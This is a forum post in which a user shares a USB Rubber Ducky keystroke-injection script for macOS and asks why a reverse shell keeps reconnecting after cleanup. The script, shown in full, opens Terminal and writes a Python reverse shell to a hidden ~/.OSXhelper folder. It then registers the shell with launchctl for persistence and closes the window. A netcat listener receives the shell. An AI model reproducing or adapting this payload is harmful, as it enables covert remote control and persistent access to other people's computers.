Jump to content

osx reverse shell payload ... undo?


brazen
 Share

Go to solution Solved by brazen,

Recommended Posts

I downloaded the osx reverse shell payload from: http://sunstudiophoto.com/ducky/

i turned on my vpn, got my external ip address, and plugin the ip address into the script

DELAY 3000

GUI SPACE

DELAY 500

STRING Utilities

DELAY 1000

ENTER

DELAY 1000

STRING terminal

GUI DOWNARROW

DELAY 3500

STRING cd ~

ENTER

STRING mkdir .OSXhelper

ENTER

STRING cd .OSXhelper

ENTER

STRING echo "python -c 'import socket,subprocess,os;

STRING s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

STRING s.connect((\"192.168.0.13\",8888));

STRING os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);

STRING p=subprocess.call([\"/bin/sh\",\"-i\"]);'" > helper.sh

ENTER

STRING chmod +rwx helper.sh

ENTER

STRING launchctl submit -l yes -p ~/.OSXhelper/helper.sh

ENTER

STRING ./helper.sh&

ENTER

DELAY 500

STRING exit

ENTER

DELAY 500

GUI q

DELAY 500

GUI w

then i

netcat -l -p 8888

BAMMMM! EVERYTHING WORKS PERFECTLY!!!!

however (comma) afterwards (i went back in and deleted the .OSXhelper folder and .maintScript folder (from the other simple-ducky payload generator, closed terminal... and went to test another payload for osx.

when i typed again on kali terminal

netcat -l -p 8888

i get an error message:

"shell-init: error retrieving current directory: getcwd: cannot access parent directories: no such file or directory.

sh-3.2$"

how do I stop this from happening?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...